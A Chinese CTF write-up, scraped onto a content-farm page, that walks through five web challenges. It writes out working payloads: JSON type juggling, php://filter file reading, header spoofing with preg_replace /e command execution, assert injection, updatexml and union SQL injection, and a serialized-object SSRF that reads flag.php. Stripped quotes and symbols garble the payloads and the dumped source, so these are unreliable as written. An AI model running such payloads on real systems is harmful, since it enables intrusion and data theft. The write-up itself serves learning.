当前位置: 首页 > news >正文

鲜花外贸网站建设wordpress手机版弹出式导航

鲜花外贸网站建设,wordpress手机版弹出式导航,更新目录wordpress,专业网站建设设计目录 ①lottery ②ics-05 ③mfw ④simple_js ⑤fakebook 感觉自己对一些综合题的熟练度不太够#xff0c;专项训练一下 ①lottery 抽奖赚钱#xff0c;钱够9990000可买flag 随便输一串数字抓包#xff0c;然后查看到一个post请求#xff0c;api.php,题目里面有附件…目录 ①lottery ②ics-05 ③mfw ④simple_js ⑤fakebook  感觉自己对一些综合题的熟练度不太够专项训练一下 ①lottery 抽奖赚钱钱够9990000可买flag  随便输一串数字抓包然后查看到一个post请求api.php,题目里面有附件下载看一下源代码 关键部分如下可以利用传入” true 来绕过判断 发现传入的是json数据改传入内容 {action:buy,numbers: [true,true,true,true,true,true,true]} repeater反复发包刷钱买flag ②ics-05 进来随便点一点发现只有设备维护中心可以跳转 右键查看源码 有个链接点一下看看 发现文件包含点 ?page 扫个目录看一下 读index.php源码 ?pagephp://filter/convert.base64-encode/resourceindex.php base64解码  ?php error_reporting(0);session_start(); posix_setuid(1000);? !DOCTYPE HTML htmlheadmeta charsetutf-8meta namerenderer contentwebkitmeta http-equivX-UA-Compatible contentIEedge,chrome1meta nameviewport contentwidthdevice-width, initial-scale1, maximum-scale1link relstylesheet hreflayui/css/layui.css mediaalltitle设å¤ç»´æ¤ä¸­å¿/titlemeta charsetutf-8 /headbodyul classlayui-navli classlayui-nav-item layui-thisa href?pageindexäºå¹³å°è®¾å¤ç»´æ¤ä¸­å¿/a/li/ulfieldset classlayui-elem-field layui-field-title stylemargin-top: 30px;legend设å¤å表/legend/fieldsettable classlayui-hide idtest/tablescript typetext/html idswitchTpl!-- è¿éç checked çç¶æåªæ¯æ¼ç¤º --input typecheckbox namesex value{{d.id}} lay-skinswitch lay-textå¼|å³ lay-filtercheckDemo {{ d.id1 0003 ? checked : }}/scriptscript srclayui/layui.js charsetutf-8/scriptscriptlayui.use(table, function() {var table layui.table,form layui.form;table.render({elem: #test,url: /somrthing.json,cellMinWidth: 80,cols: [[{ type: numbers },{ type: checkbox },{ field: id, title: ID, width: 100, unresize: true, sort: true },{ field: name, title: 设å¤å, templet: #nameTpl },{ field: area, title: åºå },{ field: status, title: ç»´æ¤ç¶æ, minWidth: 120, sort: true },{ field: check, title: 设å¤å¼å³, width: 85, templet: #switchTpl, unresize: true }]],page: true});});/scriptscriptlayui.use(element, function() {var element layui.element; //导èªçhoverææãäºçº§èåç­åè½ï¼éè¦ä¾èµelement模å//çå¬å¯¼èªç¹å»element.on(nav(demo), function(elem) {//console.log(elem)layer.msg(elem.text());});});/script?php$page $_GET[page];if (isset($page)) {if (ctype_alnum($page)) { ?br /br /br /br /div styletext-align:centerp classlead?php echo $page; die();?/pbr /br /br /br /?php}else{?br /br /br /br /div styletext-align:centerp classlead?phpif (strpos($page, input) 0) {die();}if (strpos($page, ta:text) 0) {die();}if (strpos($page, text) 0) {die();}if ($page index.php) {die(Ok);}include($page);die();?/pbr /br /br /br /?php }}//æ¹ä¾¿çå®ç°è¾å¥è¾åºçåè½,æ­£å¨å¼å中çåè½ï¼åªè½åé¨äººåæµè¯if ($_SERVER[HTTP_X_FORWARDED_FOR] 127.0.0.1) {echo br Welcome My Admin ! br ;$pattern $_GET[pat];$replacement $_GET[rep];$subject $_GET[sub];if (isset($pattern) isset($replacement) isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}}?/body/html 关键在最后一段 preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换如果启用/e参数的话就会将replacement当做php代码执行。 xff伪造后 /index.php?pat/abc/erepsystem(ls)subabc /index.php?pat/abc/erepsystem(cd%20s3chahahaDir;ls)subabc /index.php?pat/abc/erepsystem(cat%20s3chahahaDir/flag/flag.php)subabc ③mfw 存在文件包含 信息搜集发现是git源码泄露 利用点在assert 可以先闭合再执行 payload: ?page) or system(cat templates/flag.php);// (url中不认识#可以用%23或者//来代替注释) 注意这里//并不会注释assert本身的括号注释符是assert()开始执行时对里面的字符串内容才生效 ④simple_js 进来就让输密码 先随便输看回显 看一下js代码 一眼16进制转字符串 一眼assic码 放python里跑一下得出flag  arr[55,56,54,79,115,69,114,116,107,49,50] flag for i in arr:flagchr(i) print(flag:flag)⑤fakebook  经典之作再回顾 随便注册一个先 点一下链接 url似乎发现了注入点 sqlmap没跑出来无奈只能手注 判断出是数字型注入的同时发现有报错回显 直接报错注入  ?no1 or updatexml(1,concat(^,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),^),1)%23 ?no1 or updatexml(1,concat(^,(select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase()),^),1)%23 ?no1 or updatexml(1,concat(^,(select group_concat(no,username,passwd,data) from users),^),1)%23 然而继续打并没有拿到flag ?no1 or updatexml(1,substr(concat(^,(select group_concat(data) from users),^),1,31),1)%23 ... (或者?no-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users) 可以打出来完整的data发现是序列化后的注册信息 O:8:UserInfo:3:{s:4:name;s:1:1;s:3:age;i:1;s:4:blog;s:13:www.baidu.com;}  目前为止还没什么头绪再信息搜集一波 扫个目录 访问/robots.txt 访问/user.php.bak 下载附件贴出源码 ?phpclass UserInfo {public $name ;public $age 0;public $blog ;public function __construct($name, $age, $blog){$this-name $name;$this-age (int)$age;$this-blog $blog;}function get($url){$ch curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output curl_exec($ch);$httpCode curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this-get($this-blog);}public function isValidBlog (){$blog $this-blog;return preg_match(/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]\.)[a-zA-Z]{2,6}(\:[0-9])?(\/\S*)?$/i, $blog);}} 这个地方是直接把blog当作参数传给get()函数url没有经过任何限制存在ssrf可以使用file:///var/www/html/flag.php读取flag.php 这时候又注意到unserialize报错1,2,3,4一个一个替换成序列化字符串去试  最终payload: payload:?no-1 union/**/select 1,2,3,O:8:UserInfo:3:{s:4:name;s:1:1;s:3:age;i:1;s:4:blog;s:29:file:///var/www/html/flag.php;} 查看源码 发现多出一个链接点击即可
http://www.sadfv.cn/news/8858/

相关文章:

  • 建物流网站温州市城市建设学校网站
  • 莱州网站建设关键字排名优化网络托管微信代运营网站开发的感想
  • 临沂网站制作案例网站服务器++免费
  • 做网站用框架么网站系统建设合同
  • 优惠券网站怎么做的软件外包公司排名前十名
  • 哪个网站做的ppt模板好有没有一种网站做拍卖厂的
  • 买源码的网站青岛网站建设模板下载
  • 西安建设厅网站网站建设平台分析
  • 佛山网站建设佛山网络推广自贡建设机械网站
  • html5微网站源码举报不良网站信息怎么做
  • 开展建设文明网站活动方案杭州网站优化搜索
  • 建设厅网站关于建筑资质合并搜索引擎优化seo公司
  • 厦门网站排名网站制作咨询公司
  • 外贸专业网站制作网站备案营业执照
  • 海南省住房和城市建设厅网站免费做一建或二建题目的网站
  • 成都官方网站建设设计制作合同模板
  • 公司网站建设怎么st3网站开发
  • 咸阳专业学校网站建设网站投放
  • 良乡网站建设快手营销软件
  • 视屏网站制作网站建设代理都有哪些
  • 网站怎么做接口wordpress新浪jquery
  • 新网站做百度推广 收录赣州科技有限公司
  • 专门做图片的网站cms展示型企业网站制作费用
  • 镇江网站设计公司报价北京公司网站制作方法
  • 舟山市住房城乡建设局网站公司做网站费用会计分录
  • 自己做的网站百度搜不到中国进入一级战备2023
  • 重庆网站推广 软件社区平安建设基层网站
  • 帮别人做网站赚钱吗西宁做网站公司排名
  • 做外贸的网站需要什么应用网站开发
  • 做网站郴州专业网站托管